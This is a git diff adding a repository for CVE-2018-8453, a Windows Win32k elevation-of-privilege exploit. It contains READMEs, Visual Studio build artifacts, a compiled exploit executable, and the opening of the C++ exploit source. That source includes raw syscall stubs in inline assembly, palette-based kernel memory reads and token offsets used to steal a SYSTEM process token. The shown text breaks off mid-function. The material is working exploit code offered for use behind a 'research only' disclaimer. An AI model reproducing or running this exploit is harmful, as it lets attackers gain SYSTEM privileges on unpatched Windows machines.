diff --git a/CVE-2018-8453/4.mp4 b/CVE-2018-8453/4.mp4
new file mode 100644
index 0000000..68a9de1
Binary files /dev/null and b/CVE-2018-8453/4.mp4 differ
diff --git a/CVE-2018-8453/README.md b/CVE-2018-8453/README.md
new file mode 100644
index 0000000..5e04340
--- /dev/null
+++ b/CVE-2018-8453/README.md
@@ -0,0 +1,14 @@
+# Privilege escalation
+
+## Description
+
+```
+An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.
+```
+
+## Vulnerability reference
+
+* [CVE-2018-8453](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8453)
+* [https://github.com/ze0r/cve-2018-8453-exp](https://github.com/ze0r/cve-2018-8453-exp)
+* [[上篇]从补丁diff到EXP--CVE-2018-8453漏洞分析与利用](https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig)
+* [[下篇]从补丁diff到EXP--CVE-2018-8453漏洞分析与利用](https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ)
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/1.jpg b/CVE-2018-8453/exp-x86_pool_fengshui/1.jpg
new file mode 100644
index 0000000..446b320
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/1.jpg differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/2.jpg b/CVE-2018-8453/exp-x86_pool_fengshui/2.jpg
new file mode 100644
index 0000000..5e459c6
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/2.jpg differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/3.jpg b/CVE-2018-8453/exp-x86_pool_fengshui/3.jpg
new file mode 100644
index 0000000..efae189
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/3.jpg differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/4.mp4 b/CVE-2018-8453/exp-x86_pool_fengshui/4.mp4
new file mode 100644
index 0000000..68a9de1
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/4.mp4 differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/README.md b/CVE-2018-8453/exp-x86_pool_fengshui/README.md
new file mode 100644
index 0000000..06c960d
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/README.md
@@ -0,0 +1,13 @@
+# cve-2018-8453-exp
+cve-2018-8453 exp
+本程序为cve-2018-8453的利用程序。
+漏洞本身存在于win7及以后版本
+但注意: 只有在win8.1及以后版本中才能利用!故本EXP只可用于WIN8.1及以后版本。
+
+开发\测试平台:windows 10 rs2 15063
+附: 使用Palette来读写内核
+
+windows 2008 和 windows2012 x64位改版中。。
+
+
+严重声明: 本工具仅用于技术研究学习。非法使用造成一切后果,均与本人无关。
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/.vs/cve8453/v14/.suo b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/.vs/cve8453/v14/.suo
new file mode 100644
index 0000000..288a0bd
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/.vs/cve8453/v14/.suo differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/Release/cve8453.exe b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/Release/cve8453.exe
new file mode 100644
index 0000000..8019193
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/Release/cve8453.exe differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453.VC.db b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453.VC.db
new file mode 100644
index 0000000..0e411b6
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453.VC.db differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453.sln b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453.sln
new file mode 100644
index 0000000..cb4b626
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453.sln
@@ -0,0 +1,28 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio 14
+VisualStudioVersion = 14.0.25420.1
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cve8453", "cve8453\cve8453.vcxproj", "{9EAE33EA-0B19-4794-B231-0D53D802B882}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Debug|x64.ActiveCfg = Debug|x64
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Debug|x64.Build.0 = Debug|x64
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Debug|x86.ActiveCfg = Debug|Win32
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Debug|x86.Build.0 = Debug|Win32
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Release|x64.ActiveCfg = Release|x64
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Release|x64.Build.0 = Release|x64
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Release|x86.ActiveCfg = Release|Win32
+ {9EAE33EA-0B19-4794-B231-0D53D802B882}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.log b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.log
new file mode 100644
index 0000000..df9d0e9
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.log
@@ -0,0 +1,4 @@
+ stdafx.cpp
+ cve8453.cpp
+ cve8453.vcxproj -> c:\users\ze0r\desktop\cve8453\Debug\cve8453.exe
+ cve8453.vcxproj -> c:\users\ze0r\desktop\cve8453\Debug\cve8453.pdb (Full PDB)
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.obj b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.obj
new file mode 100644
index 0000000..313818e
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.pch b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.pch
new file mode 100644
index 0000000..05e7706
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.pch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.res b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.res
new file mode 100644
index 0000000..dad5dde
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.res differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..742b9a2
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..a295939
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..f4b2ef8
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/cve8453.lastbuildstate b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/cve8453.lastbuildstate
new file mode 100644
index 0000000..6c36556
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/cve8453.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Debug|Win32|c:\users\ze0r\desktop\cve8453\|
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.command.1.tlog
new file mode 100644
index 0000000..9012683
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.read.1.tlog
new file mode 100644
index 0000000..be50726
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.write.1.tlog
new file mode 100644
index 0000000..0dd87ca
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.command.1.tlog
new file mode 100644
index 0000000..ae5239d
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.read.1.tlog
new file mode 100644
index 0000000..7e37c35
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.write.1.tlog
new file mode 100644
index 0000000..bbf7e63
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/cve8453.tlog/rc.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/stdafx.obj b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/stdafx.obj
new file mode 100644
index 0000000..d8f8b19
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/stdafx.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/vc140.idb b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/vc140.idb
new file mode 100644
index 0000000..5c423e1
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/vc140.idb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/vc140.pdb b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/vc140.pdb
new file mode 100644
index 0000000..7d1655e
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Debug/vc140.pdb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/ReadMe.txt b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/ReadMe.txt
new file mode 100644
index 0000000..2d0f77d
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/ReadMe.txt
@@ -0,0 +1,45 @@
+========================================================================
+ WIN32 应用程序:cve8453 项目概述
+========================================================================
+
+应用程序向导已为您创建了此 cve8453 应用程序。
+
+本文件概要介绍组成 cve8453 应用程序的每个文件的内容。
+
+
+cve8453.vcxproj
+ 这是使用应用程序向导生成的 VC++ 项目的主项目文件,其中包含生成该文件的 Visual C++ 的版本信息,以及有关使用应用程序向导选择的平台、配置和项目功能的信息。
+
+cve8453.vcxproj.filters
+ 这是使用“应用程序向导”生成的 VC++ 项目筛选器文件。它包含有关项目文件与筛选器之间的关联信息。在 IDE 中,通过这种关联,在特定节点下以分组形式显示具有相似扩展名的文件。例如,“.cpp”文件与“源文件”筛选器关联。
+
+cve8453.cpp
+ 这是主应用程序源文件。
+
+/////////////////////////////////////////////////////////////////////////////
+应用程序向导创建了下列资源:
+
+cve8453.rc
+ 这是程序使用的所有 Microsoft Windows 资源的列表。它包括 RES 子目录中存储的图标、位图和光标。此文件可以直接在 Microsoft Visual C++ 中进行编辑。
+
+Resource.h
+ 这是标准头文件,可用于定义新的资源 ID。Microsoft Visual C++ 将读取并更新此文件。
+
+cve8453.ico
+ 这是用作应用程序图标 (32x32) 的图标文件。此图标包括在主资源文件 cve8453.rc 中。
+
+small.ico
+ 这是一个图标文件,其中包含应用程序的图标的较小版本 (16x16)。此图标包括在主资源文件 cve8453.rc 中。
+
+/////////////////////////////////////////////////////////////////////////////
+其他标准文件:
+
+StdAfx.h, StdAfx.cpp
+ 这些文件用于生成名为 cve8453.pch 的预编译头 (PCH) 文件和名为 StdAfx.obj 的预编译类型文件。
+
+/////////////////////////////////////////////////////////////////////////////
+其他注释:
+
+应用程序向导使用“TODO:”注释来指示应添加或自定义的源代码部分。
+
+/////////////////////////////////////////////////////////////////////////////
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.Build.CppClean.log b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.Build.CppClean.log
new file mode 100644
index 0000000..ab9887c
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.Build.CppClean.log
@@ -0,0 +1,18 @@
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.pch
+c:\users\ze0r\desktop\cve8453\cve8453\release\vc140.pdb
+c:\users\ze0r\desktop\cve8453\cve8453\release\stdafx.obj
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.obj
+c:\users\ze0r\desktop\cve8453\release\cve8453.exe
+c:\users\ze0r\desktop\cve8453\release\cve8453.ipdb
+c:\users\ze0r\desktop\cve8453\release\cve8453.iobj
+c:\users\ze0r\desktop\cve8453\release\cve8453.pdb
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.res
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\cl.command.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\cl.read.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\cl.write.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\link.command.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\link.read.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\link.write.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\rc.command.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\rc.read.1.tlog
+c:\users\ze0r\desktop\cve8453\cve8453\release\cve8453.tlog\rc.write.1.tlog
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.log b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.log
new file mode 100644
index 0000000..4dc0050
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.log
@@ -0,0 +1,8 @@
+ cve8453.cpp
+ 正在生成代码
+ 1 of 123 functions ( 0.8%) were compiled, the rest were copied from previous compilation.
+ 0 functions were new in current compilation
+ 0 functions had inline decision re-evaluated but remain unchanged
+ 已完成代码的生成
+ cve8453.vcxproj -> C:\Users\ze0r\Desktop\cve8453\Release\cve8453.exe
+ cve8453.vcxproj -> C:\Users\ze0r\Desktop\cve8453\Release\cve8453.pdb (Full PDB)
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.obj b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.obj
new file mode 100644
index 0000000..792f03d
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.pch b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.pch
new file mode 100644
index 0000000..5e8ad85
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.pch differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.res b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.res
new file mode 100644
index 0000000..dad5dde
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.res differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.command.1.tlog
new file mode 100644
index 0000000..9561f96
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.read.1.tlog
new file mode 100644
index 0000000..1d4afbc
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.write.1.tlog
new file mode 100644
index 0000000..9a863ed
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/CL.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/cve8453.lastbuildstate b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/cve8453.lastbuildstate
new file mode 100644
index 0000000..787bf13
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/cve8453.lastbuildstate
@@ -0,0 +1,2 @@
+#TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
+Release|Win32|C:\Users\ze0r\Desktop\cve8453\|
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.command.1.tlog
new file mode 100644
index 0000000..c8c12b3
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.read.1.tlog
new file mode 100644
index 0000000..ed7987c
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.write.1.tlog
new file mode 100644
index 0000000..59e1953
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/link.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.command.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.command.1.tlog
new file mode 100644
index 0000000..6723925
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.command.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.read.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.read.1.tlog
new file mode 100644
index 0000000..7e37c35
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.read.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.write.1.tlog b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.write.1.tlog
new file mode 100644
index 0000000..1322886
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/cve8453.tlog/rc.write.1.tlog differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/stdafx.obj b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/stdafx.obj
new file mode 100644
index 0000000..663e7c3
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/stdafx.obj differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/vc140.pdb b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/vc140.pdb
new file mode 100644
index 0000000..c113851
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Release/vc140.pdb differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Resource.h b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Resource.h
new file mode 100644
index 0000000..060a1b8
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/Resource.h
@@ -0,0 +1,31 @@
+//{{NO_DEPENDENCIES}}
+// Microsoft Visual C++ generated include file.
+// Used by cve8453.rc
+//
+
+#define IDS_APP_TITLE 103
+
+#define IDR_MAINFRAME 128
+#define IDD_CVE8453_DIALOG 102
+#define IDD_ABOUTBOX 103
+#define IDM_ABOUT 104
+#define IDM_EXIT 105
+#define IDI_CVE8453 107
+#define IDI_SMALL 108
+#define IDC_CVE8453 109
+#define IDC_MYICON 2
+#ifndef IDC_STATIC
+#define IDC_STATIC -1
+#endif
+// �¶������һ��Ĭ��ֵ
+//
+#ifdef APSTUDIO_INVOKED
+#ifndef APSTUDIO_READONLY_SYMBOLS
+
+#define _APS_NO_MFC 130
+#define _APS_NEXT_RESOURCE_VALUE 129
+#define _APS_NEXT_COMMAND_VALUE 32771
+#define _APS_NEXT_CONTROL_VALUE 1000
+#define _APS_NEXT_SYMED_VALUE 110
+#endif
+#endif
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.aps b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.aps
new file mode 100644
index 0000000..1815b73
Binary files /dev/null and b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.aps differ
diff --git a/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.cpp b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.cpp
new file mode 100644
index 0000000..8b45412
--- /dev/null
+++ b/CVE-2018-8453/exp-x86_pool_fengshui/cve8453-GUI/cve8453/cve8453.cpp
@@ -0,0 +1,407 @@
+#include "windows.h"
+#include "stdafx.h"
+#include "psapi.h"
+#include "cve8453.h"
+
+BOOL bMSGSENT = FALSE;
+HWND hMainWND;
+HWND hSBWND;
+HWND hSBWNDnew;
+DWORD SystemCallStub;
+CHAR flag[0x80] = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ze0r is so cool!";
+
+HPALETTE hManager;
+HPALETTE hWorker;
+HPALETTE hKeep;
+HDC hKeepDC = NULL;
+PDWORD CallbackTb = 0;
+LPACCEL lpAccel;
+
+typedef VOID(WINAPI * fct_fnDispatch)(PDWORD msg);
+
+fct_fnDispatch fnDWORD;
+fct_fnDispatch fnClientFreeWindowClassExtraBytes;
+
+typedef struct
+{
+ DWORD UniqueProcessIdOffset;
+ DWORD TokenOffset;
+} VersionSpecificConfig;
+
+VersionSpecificConfig gConfig = { 0xb4, 0xfc }; // Win 10 15063 rs2 x86
+
+LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);
+INT_PTR CALLBACK About(HWND, UINT, WPARAM, LPARAM);
+
+void SetWindowFNID(HWND hWnd, DWORD FNID) {
+ __asm {
+ mov esi, esi;
+ mov eax, hWnd;
+ push FNID;
+ push eax;
+ push 0;
+ mov eax, 0x1202;
+ mov edx, SystemCallStub;
+ call edx;
+ add esp, 0x0c;
+ }
+}
+
+int SetLinkedUFIs(HDC hdc,int len) {
+ int retvalue;
+ __asm {
+ push len;
+ lea eax, flag;
+ PUSH eax;
+ push hdc;
+ push 0;
+ mov eax, 0x1023;
+ mov edx, SystemCallStub;
+ call edx;
+ add esp, 0x10;
+ mov retvalue, eax;
+ }
+ return retvalue;
+}
+
+DWORD buf[0x240];
+
+void ReadMem(DWORD Addr,DWORD len) {
+ memset(buf, 0, 0x240 * 4);
+ GetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ buf[19] = Addr;
+ SetPaletteEntries(hManager, 0x2B, 50, (LPPALETTEENTRY)buf);
+ GetPaletteEntries(hWorker, 0, len, (LPPALETTEENTRY)buf);
+}
+
+ULONG GetNTOsBase()
+{
+ ULONG Bases[0x1000];
+ DWORD needed = 0;
+ ULONG krnlbase = 0;
+ if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+ krnlbase = Bases[0];
+ }
+ return krnlbase;
+}
+
+DWORD_PTR PsInitialSystemProcess(VOID)
+{
+ ULONG Module = (ULONG)LoadLibraryA("ntoskrnl.exe");
+ ULONG Addr = (ULONG)GetProcAddress((HMODULE)Module, "PsInitialSystemProcess");
+ FreeLibrary((HMODULE)Module);
+ ULONG res = 0;
